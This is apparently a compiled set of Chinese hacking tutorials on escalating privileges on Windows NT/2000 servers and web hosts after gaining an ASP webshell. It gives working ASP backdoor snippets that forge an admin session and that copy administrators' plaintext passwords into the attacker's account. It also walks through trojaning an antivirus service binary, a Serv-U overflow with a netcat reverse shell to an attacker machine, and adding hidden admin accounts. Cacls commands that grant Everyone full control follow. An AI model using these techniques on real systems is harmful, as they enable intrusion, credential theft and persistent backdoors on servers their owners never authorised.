例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT//system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll"
這樣就可以了,當你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 這個語句查之時,如果沒有看見asp.dll,
說明,asp的權限又恢復到以前的權限.
--------------------------------------------------------------------------------
-- --
　　 winNT/2000提升權限
　　 Windows NT/2000 通用的提升方法
　 　 攻擊者在獲得系統一定的訪問權限後通常要把自己的權限提升到管理員組，這樣攻擊者就控制了該計算機系統。這主要有以下幾種方法：1.獲得管理員密碼，下次 就可以用該密碼進入系統； 2. 先新建一個用戶，然後把這個普通添加到管理員組，或者乾脆直接把一個不起眼的用戶如guest 添加到管理員組； 3. 安裝後門。
　　 本文簡要介紹在 Windows NT4和 Windows 2000 裏攻擊者常用的提升權限的方法。下面是具體方法：
　　 方法1 ：下載系統的 %windir%//repair//sam.*（WinNT 4 下是sam._ 而Windows2000下是sam ）文件，然後用L0pht 等軟件進行破解，只要能拿到，肯花時間，就一定可以破解。
　　 問題：（1 ）攻擊者不一定可以訪問該文件（看攻擊者的身份和管理員的設置）；（2 ）這個文件是上次系統備份時的帳號列表（也可能是第一次系統安裝時的），以後更改帳號口令的話，就沒用了。
　　 方法2 ：使用pwdump（L0pht 自帶的，Windows 2000下無效）或者pwdump2 ，取得系統當前的用戶列表和口令加密列表，然後用L0pht 破解這個列表。
　　 問題：普通用戶不能成功運行pwdump類程序（沒有權限），例如：使用unicode漏洞進入系統時是IUSR_computer 身份，該用戶一般只屬於guests組的，運行pwdump類程序就會失敗。
　　 （以上兩種是離線的）
　　 方法3 ：使用 Enum 等程序進行遠程破解，猜口令。enum可以使用指定的字典對遠程主機的某個用戶進行破解。
　　 問題：（1 ）如果系統設置了帳號鎖定的話，破解幾次失敗，該帳號就鎖定了，暫時不能再破解；（2 ）要遠程系統開放 Netbios連接，就是 TCP的139 端口，如果用防火牆過濾了的話 Enum 就無法連接到主機。
　　 （以上方法是通過破解獲得密碼的，還有直接把當前用戶提升權限或者添加用戶到管理員組的方法。）
　　 方法4 ：GetAdmin（WinNT 4 下）、PipeUpAdmin （Windows 2000下），在本機運行可以把當前用戶帳號加入管理員組。而 PipeUpAdmin則比較厲害，普通用戶和Guests組用戶都可以成功運行。
　　 問題：GetAdmin在 SP4有補丁修復了，不能用於高於 SP4的 WinNT 4系統，當然後來又有GetAdmin的增強版本，不過在 SP6a 下好像都不能成功運行。
　　 注：這一方法利用了 WinNT 4系統的安全漏洞，可以安裝補丁解決這一問題。
　　 （此外還有變通的方法。）
　　 方法5 ：在WinNT 4 和 Windows 2000 註冊表裏指定用戶Shell 程序（Explorer.exe）
　　 時沒有使用絕對路徑，而是使用了一個相對路徑的文件名（考慮到兼容性問題）。
　　 由於在系統啓動時程序的搜索順序問題使得 %Systemdrive%//Explorer.exe（操作系統安裝的跟目錄下的Explorer.exe）程序執行，這提供了攻擊者一個機會在用戶下次登錄時執行他自己的程序。
　　 問題：攻擊者必須有安裝系統邏輯盤跟目錄的寫權限纔行，而一般管理員都設置該目錄普通用戶禁寫。
　　 注：這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞，可以安裝補丁解決這種問題。
　　 方法6 ：木馬：上傳木馬，然後運行木馬，系統重起動後，木馬就是本地登錄用戶的身份了，然後攻擊者連接後就有了本地登錄用戶的權限。因爲一般總是管理員本地登錄系統，因此這樣很可能就獲得了管理員的權限。
　　 問題：（1 ）殺毒軟件或病毒防火牆可能阻止木馬運行，還有可能把木馬殺死。
　 　 （2 ）有的木馬不能在Guests組身份下運行，這可能與它添加自動運行的方式有關；如沒有權限改寫註冊表的自動運行位置，不能寫入%system% // system32目錄（一般的木馬都改變文件名，然後寫入系統目錄，如果沒有寫入權限系統目錄，就不能成功執行木馬）。
　　 解決：不過也有用壓縮程序（不是通常說的壓縮程序，這種壓縮程序把可執行程序壓縮後，文件變小了，但是仍然可以正常執行）將木馬壓縮，從而逃過殺毒軟件的 特徵碼檢測。我曾使用Aspack成功壓縮了一個木馬，逃過了金山毒霸正式版的檢測。不過也有的木馬Aspack壓縮不了，如冰河。
　　 方法7 ： Gina、GinaStub木馬。雖然這個也叫木馬，但是它的功能和上邊的那種大不相同，因爲一般的木馬是在對方安裝一個server端，一旦運行就可以 使用client端連接到server端，並進行操作。而 ginastub 一般只有一個動態連接庫文件，需要手工安裝和卸載，他的功能也不是使用 client端控制server端，它僅僅就是捕獲用戶的登錄密碼。
　　 問題：安裝較麻煩，成功的可能性低，而且安裝不當會造成被安裝的系統不能啓動。
　　 注：這一方法利用的不是系統的安全漏洞，因此不能通過安裝補丁解決這一問題。關於Gina，可以參見我的另一篇文章《WinLogon登錄管理和GINA簡介》
　 　 方法8 ：本地溢出。緩衝區溢出是進行攻擊的最好辦法，因爲一般都可以獲得系統權限或者管理員權限；不過很多遠程溢出攻擊不需要事先有執行程序的權限，而本地溢出 就恰好適合提升權限。Win NT4 的 IIS4 的 ASP擴展有一個本地溢出漏洞，Windows 2000的靜態圖像服務也有一個溢出漏洞，利用該漏洞，攻擊者可以獲得系統權限。當然 Windows NT 和 Windows 2000 還有很多程序有溢出漏洞，這是這些程序不是總在運行，因此被利用的可能性比較小。
　　 問題：（1 ）ASP 擴展的溢出漏洞需要攻擊者有向網站的腳本目錄的寫權限，才能把攻擊程序放到網站上，然後執行。
　　 （2 ）靜態圖像服務缺省沒有安裝，只有用戶在 Windows 2000 上安裝靜態圖像設備（如數碼相機、掃描儀等）時才自動安裝。
　　 注：這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞，可以安裝補丁解決這種問題。
　 　 Windows 2000專用提升漏洞方法方法1 ： Windows 2000 的輸入法漏洞，利用這個漏洞任何人可以以LocalSystem 身份執行程序，從而可以用來提升權限，不過該漏洞一般限於物理接觸 Windows 2000 計算機的人。當然如果開放了終端服務的話，攻擊者也可以遠程利用該漏洞。
　　 注：這一方法利用了 Windows 2000 系統的安全漏洞，可以安裝補丁解決這一問題。
　　 方法2 ：利用 Windows 2000 的 Network DDE DSDM 服務漏洞普通用戶可以LocalSystem 身份執行任意程序，可以藉此更改密碼、添加用戶等。Guests組用戶也可以成功利用該漏洞。
　　 問題：這個服務缺省沒有啓動，需要啓動這個服務。
　　 注：這一方法利用了 Windows 2000 系統的安全漏洞，可以安裝補丁解決這一問題。
　 　 方法3 ：Windows 2000的 TELNET 服務進程建立時，該服務會創建一個命名管道，並用它來執行命令。但是，該管道的名字能被預見。如果 TELNET 發現一個已存在的管道名，它將直接用它。攻擊者利用此漏洞，能預先建立一個管道名，當下一次 TELNET 創建服務進程時，便會在本地 SYSTEM 環境中運行攻擊者代碼。
　　 注：這一方法利用了 Windows 2000 系統的安全漏洞，可以安裝補丁解決這一問題。
　　 方法 4 ：WINDOWS 2K存在一個利用 Debug Registers提升權限的漏洞。如果攻擊者能在 WIN2K中運行程序，利用此漏洞，他至少能取得對 %Windir%//SYSTEM32和註冊表HKCR的寫權。因爲x86 Debug Registers DR0-7 對於所有進程都是全局共享的，因此在一個進程中設置硬件斷點，將影響其它進程和服務程序。
　　 注：這一方法利用了 Windows 2000 系統的安全漏洞，不過到目前爲止微軟仍然沒有補丁可以安裝，但是漏洞攻擊程序已經出現了，因此只能堵住攻擊者的入口來阻止利用該漏洞。
-------------------------------------------------------------------------------- --
-- 巧妙配合asp木馬取得後臺管理權限頂(這個可是經典。。。自己體會我不多說了)

前 段時間氾濫成災的動網論壇上傳漏洞以及最近接二連三的各種asp系統暴露的上傳漏洞，可能很多朋友手中有了很多webshell的肉雞，至於選擇怎麼樣這 些小雞的方式也是因人而異，有人繼續提升權限，進一步入侵，也有人只是看看，馬兒放上去了過了就忘記了，也有一些朋友，當webshell的新鮮勁兒過去 了後臺的神祕感和誘惑力也就大大增加。其實，對很多功能強大的系統而言，拿到後臺也就是拿到了一個好的後門了，呵呵............但是現在比較 新的版本的很多asp系統密碼都是MD5加密然後配合嚴格的驗證程序來驗證的，但是我們就沒有辦法突破這些限制了嗎？no!我今天就是要說怎麼突破這些限 制讓我們直奔後臺，有馬兒廄是好辦事，follow
me............
session欺騙篇
首先簡單說一下一般asp系統的身份驗證原理。
一 般來說，後臺管理員在登錄頁面輸入賬號密碼後，程序會拿着他提交的用戶名密碼去數據庫的管理員表裏面找，如果有這個人的賬號密碼就認爲你是管理員，然後給 你一個表示你身份的session值。或者程序先把你的用戶名密碼提取出來，然後到數據庫的管理員表裏面取出管理員的賬號密碼來和你提交的相比較，如果相 等，就跟上面一樣給你個表示你身份的sesion值。然後你進入任何一個管理頁面它都要首先驗證你的session值，如果是管理員就讓你通過，不是的話 就引導你回到登錄頁面或者出現一些奇奇怪怪的警告，這些都跟程序員的個人喜好有關。
知道了原理，我們現在的一個思路就是通過我們的asp木馬 來修改它的程序然後拿到一個管理員session，這樣的話儘管我們沒有管理員密碼，但是我們一樣在後臺通行無阻了。我把這種方法稱爲session欺 騙。限於篇幅不能每個系統都能詳細說明，本文僅以動力文章系統爲例來說明。
動力文章系統3.51，（圖一）
圖一
其實動力文章系統的所有版本全部通殺，包括動易。大家可以自己實踐一下。
我們先來看一下它的驗證內容。動力文章3.51的驗證頁面在Admin_ChkLogin.asp
，其驗證內容如下：
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
rs.update
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
rs.close
set rs=nothing
call CloseConn()
Response.Redirect "Admin_Index.asp"
前面省略號是用戶名密碼不正確的驗證，直到else，看一下，如果用戶名密碼正確就給你兩個session值：
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
我們在看一下其他管理頁面是怎麼驗證session的，admin_index.asp一開始就這樣：
if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if
看 起來似乎很嚴密，但是我們看一下，它這裏值驗證一個AdminName的session，只要我們的session內容是AdminName的話不就可以 通過了？好，我們開工，先去弄到它的管理員賬號再說，這個不要我教你了吧？到他網站逛一下或者直接一點下載它的數據庫來看都可以知道。我們找個頁面來改一 下，我找一個比較沒人而內容較多的頁面FriendSite.asp（友情鏈接頁面）來改，呵呵，這樣管理員也很難查得出來啊。用asp木馬的編輯功能來 編輯一下它的內容。在他頁面下隱蔽處加上下面幾句話：
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin" '這裏是假設的，實際操作中可以改成你想要得管理員賬號
end if
我簡單說一下這句話的意思，就是說從地址欄取得hehe的值，如果hehe=120的話，那麼系統就給我們一個值爲admin的session。好了，我們輸入看一下，圖二：
圖二
看到有什麼異常嗎，沒有吧？還是正常頁面，但是我們接着在地址欄中輸入它的後臺管理首頁看看，是不是進去了？圖三：
圖三
呵呵，別做壞事哦............
小結一下：我們先找到弄到管理員賬號，然後找到它的驗證頁面，根據它的驗證內容來寫入我們要的後門。不同的系統有不同的驗證方式，比如青創文章系統它不但要驗證你的用戶名還要驗證等級，但是我們總體思路還是一樣，就是他驗證什麼我們就加入什麼。
密碼竊探篇
可 以說上述方法在動網論壇或者其他論壇面前是蒼白無力的，因爲一般論壇由於交互性較強，所以在驗證上考慮了很多。以動網爲例，你要登錄後臺，他先驗證你有沒 有先登錄了前臺，沒有的話就給你返回一個錯誤頁面。你登錄前臺後系統會給你一個seession來記錄你的CacheName和你的ID，然後在你登錄後 臺的時候拿出來比較你前後臺身份是否一致，一直就通過，否則kill，面對這樣嚴格的驗證，難道我們就沒有辦法基後臺了嗎？對，沒有了（誰拿雞蛋扔我？這 麼浪費。），但是我們可以想新的辦法，既然驗證這麼嚴格，那麼我如果拿着密碼光明正大的進去呢？因此，這裏一個新的思路就是拿到它的明文密碼。什麼時候有 明文密碼呢？對了，就在管理員登錄的時候。好，我們就在那裏做手腳，把它登錄的密碼發給我們，然後我們拿和它的密碼去登錄。呵呵，是不是很像 sniffer啊？在下在前幾個月剛和好兄弟潛龍在野利用硬件sniffer配合省網安局的人端掉一個非法電影網站，足足4000G的硬盤，幾十臺服務 器，一個字：爽
好了，我們開始修改它的程序。編輯login.asp，加入以下幾句話：
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username=/'"& request("username")&"/') where
UserName=/'aweige/'"
conn.execute(sql)
end if
end if
這幾句話的意思就是說如果admin（假設的，實際操作中改爲你要的管理員名字）登錄成功就更新數據庫，把他的密碼放到我資料的E-mail中。當然，你必須先在論壇裏註冊一個用戶名。結果如圖四：
圖四
還有，如果是動網7.0以下的默認數據庫admin表名和7.0以上有點不一樣，所以實際操作中不可生搬硬套。
後記：
對於以上兩種方法直到目前爲止我還想不出任何比較有效的解決方法，因爲你的網站被人家放了馬，你根本就沒辦法去阻止人家去插入，要是誰有好的解決方法記得告訴我。
另外，希望大家不要去搞破壞，那時我真的不願看到的，也祝所有的網管們好運，希望你們不會碰上craker們。
--
--
巧用asp木馬和KV2004得到管理員權限
重來沒寫過什麼文章，這是第一次，寫的不好請大家原諒，高手也不要取笑哦。這裏也沒什麼技術可言，只是我這個菜鳥的一點心得，ok開始。。。
前 段時間動網的UPfile.asp漏洞可謂鬧的沸沸揚揚，這個漏洞確實很厲害，相信不少新手和我一樣種了不少後門在有動網的網站上，但是asp木馬的權限 確實很底，除了刪點文章，刪點圖片好象沒什麼用了。不行不得到管理員權限簡直就辜負了發現這個漏洞的高手們~v~。好，想辦法提升權限，我找啊找！網上提 升權限的方法幾乎都用過了，都沒什麼用，補丁打的很全啊！接下來用findpass想解開管理員的密碼，又失敗，findpass要管理員權限纔有用。用 pslist看看暈裝的是瑞星+天網，網上的大部分工具遇上這個防禦組合一般都沒用了。種木馬？不行一來
權限太底，二來在瑞星殺天網堵的包圍 下很少能活出來的。做個添加用戶權限的bat文件想放到啓動組中去，這個方法雖然有點傻但是有一定的可行性，暈又是權限不夠加不進去。c盤下的 ";program Files" "winnt" "Documents and Settings"三個文件甲都沒有寫權限，更不要說註冊表了。鬱悶了，給管理員留了句話，然後匆匆下線。
第2天上來一看，嘿嘿圖被改回來 了，管理員應該發現了，這次更不容易得手。登上 asp木馬進去看了一下，昨天傳上去的幾個exe被刪了，還好asp木馬活下來了，咦！c盤多了文件甲叫 KV2004，原來管理員把瑞星卸了，安了個 kv2004，進Program Files看看確實瑞星被卸了。（這裏說一下，大部分的殺毒軟件默認的安裝路徑c://Program Files/ /,但是kv默認的安裝路徑是c://kv2004//）到這裏機會就來了我們可以把執行文件捆綁在kv2004上，跟隨kv一起啓動。因爲 kv不在 ";program Files" "winnt" "Documents and Settings"這三個文件甲中，很大可能我可以修改
或者上傳文件。行動！在kv2004下隨便找個htm文件刪除：(看看有無寫刪權限）
C://>del c://kv2004//GetLicense.htm
拒絕訪問
奇怪了，再來看看文件甲屬性
C://>attrib c://kv2004
S R C://KV2004
哦是隻讀。
C://>attrib -r -s c://kv2004
ok！在試試
C://>del c://kv2004//GetLicense.htm
成功了！好寫個起用帳號和提升權限的bat文件，然後把bat文件和kv2004的系統服務文件KVSrvXP.exe捆綁起來，（注意多下種捆綁器，捆綁一
次用kv2004來掃描一次，因爲很多捆綁器生成的文件kv會把他作爲病毒來處理掉）準備上傳了，先刪掉原來的KVSrvXP.exe。
C://>del c://kv2004//KVSrvXP.exe
拒絕訪問
可能是KVSrvXP.exe被windows調用中，刪不掉。沒辦法了嗎？不，刪不掉我改名
C://>ren c://kv2004//KVSrvXP.exe kv.exe
OK!然後用asp木馬把修改了的KVSrvXP.exe上傳到kv2004中，接下來就去睡覺把。
4個小時後登上來用：
net user 起用的帳戶
已經在administrators組中，接下來要關防火牆，關殺毒軟件，還是種木馬你隨便我了，哈哈！
我覺得入侵沒什麼固定的模式，具體情況具體分析，殺毒軟件同樣也可以幫我們忙，這裏我只提供了一種思路。請大家指教。
如何繞過防火牆提升權限
本文講的重點是webshell權限的提升和繞過防火牆，高手勿笑。
廢話少說，咱們進入正題。
首先確定一下目標：http://www.sun***.com ，常見的虛擬主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell，不是DVBBS，而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.sun***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp，用過動鯊的 door.exe的人都知道，這個是上傳asp木馬內容的。於是，上傳海洋2005a，成功獲得webshell。
測 試一下權限，在cmd裏運行set，獲得主機一些信息，系統盤是D盤，也說明了我們的webshell有運行權限的。那我們看看C盤有什麼呢？難道是雙系 統？瀏覽後發現沒有什麼系統文件，只有一些垃圾文件，暈死。沒關係，再來檢查一下，虛擬主機都有serv-u的，這臺也不例外，是5.0.0.8的。呵 呵，是有本地溢出的呀，挖哈哈。
思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統shell。大家 是不是發現海洋2005a那個上傳的組件不好用（反正我總遇到這個問題），沒關係，用rain改的一個無組件上傳，一共有3個文件，up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾，up.htm是本地用的，修改up.htm 裏的鏈接地址爲：http://www.sun***.com/lemon/upload.asp就可以上傳了。
傳 上了srv.exe和nc.exe在H://long//sun***//lemon（網站目錄）後，發現沒有運行權限。沒關係，根據經驗，一般系統下 D: //Documents and Settings//All Users//是應該有運行權限的。於是想把文件copy過去，但是發現我們的 webshell沒有對D盤寫的權限，暈死。
可以瀏覽D://program files//serv-u//ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。
不 可以這麼就泄氣了，我突然想到爲什麼系統不放在C盤了，難道C盤是FAT32分區的？（後來證明了我們的想法。這裏說一下，如果主機有win98的系統 盤，那裏99%是FAT32分區的。我們還遇到過裝有Ghost的主機，爲了方便在DOS下備份，它的備份盤一般都是FAT分區的。）如果系統盤是 FAT32分區，則網站就沒有什麼安全性可言了。雖然C盤不是系統盤，但是我們有執行權限。呵呵，copy srv.exe和nc.exe到c://，運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這裏的202.*.*.*是我們的肉雞，在這之前我們已經在肉雞上運行了nc –l –p 888。我們在學校內網裏，沒有公網ip，不爽-ing。
我們成功獲得一個系統shell連上肉雞。（看起來簡單，其實這裏我們也遇到過挫 折，我們發現有些版本的nc居然沒有-e這個參數，還以爲全世界nc功能都一樣。後來又發現不同版本的nc互連不成功，會出現亂碼，沒辦法用。爲此，上傳 n次，錯誤n次，傻了n次，後來終於成功了。做黑客還真得有耐心和恆心。）
高興之餘，我們仍不滿足，因爲這個shell實在是太慢了。於是， 想用我們最常用的Radmin，其實管理員一按Alt+Ctrl+Del，看進程就能發現 r_server了，但是還是喜歡用它，是因爲不會被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:// long//sun***//lemon，再用剛纔nc得到的 shell把它們copy到d://winnt//system32//下，分別運行： r_server /install , net start r_server , r_server /pass:rain /save 。
一 陣漫長的等待，終於顯示成功了。興沖沖用radmin連上去，發現連接失敗。暈死，忘了有防火牆了。上傳pslist和pskill上去，發現有 backice，木馬克星等。Kill掉他們雖然可以登陸，但服務器重啓後還是不行，終不是長久之計呀。防火牆是不防21，80等端口的，於是，我們的思 路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來，覆蓋本機的ServUDaemon.ini，在本機的serv-u上添加一個用戶名爲xr，密碼爲rain的系 統帳號，加上所有權限。再用老辦法，上傳，用shell寫入D://program files//serv-u/ /裏，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間，但是成功了，於是用flashfxp連上，發生 530錯誤。鬱悶，怎麼又失敗了。（根據經驗這樣應該就可以了，但爲什麼不行沒有想通，請高手指點。）
不管了，我們重啓serv-u就ok 了，怎麼重啓呢，開始想用 shutdown重啓系統，但那樣我們就失去了nc這個shell，還可能被發現。後來，眼睛一亮，我們不是有pskill嗎？剛纔用pslist發現有 這個進程：ServUDaemon 。把它kill了。然後再運行D://program files//serv-u// ServUAdmin.exe ，這裏要注意不是ServUDaemon.exe 。
好了，到這裏，我們直接ftp上去吧，ls一下，哈哈，系統盤在我的掌握下。我們能不能運行系統命令呢？是可以的，這樣就可以：
ftp>quote site exec net user xr rain /add
在webshell上運行net user，就可以看見添加成功了。
整個入侵滲透到這就結束了，在一陣後清理打掃後。我們就開始討論了。其實，突破防火牆有很多好的rootkit可以做到的，但是我們覺得系統自帶的服務纔是最安全的後門。
CAcls命令在提權中的使用

cacls.exe c: /e /t /g everyone:F #把c盤設置爲everyone可以瀏覽
cacls.exe d: /e /t /g everyone:F #把d盤設置爲everyone可以瀏覽
cacls.exe e: /e /t /g everyone:F #把e盤設置爲everyone可以瀏覽
cacls.exe f: /e /t /g everyone:F #把f盤設置爲everyone可以瀏覽
F:/safe/溢出工具/sqlhello2>cacls
顯示或者修改文件的訪問控制表(ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 顯示 ACL。
/T 更改當前目錄及其所有子目錄中
指定文件的 ACL。
/E 編輯 ACL 而不替換。
/C 在出現拒絕訪問錯誤時繼續。
/G user:perm 賦予指定用戶訪問權限。
Perm 可以是: R 讀取
W 寫入
C 更改(寫入)
F 完全控制
/R user 撤銷指定用戶的訪問權限(僅在與 /E 一起使用時合法)。
/P user:perm 替換指定用戶的訪問權限。
Perm 可以是: N 無
R 讀取
W 寫入
C 更改(寫入)
F 完全控制
/D user 拒絕指定用戶的訪問。
在命令中可以使用通配符指定多個文件。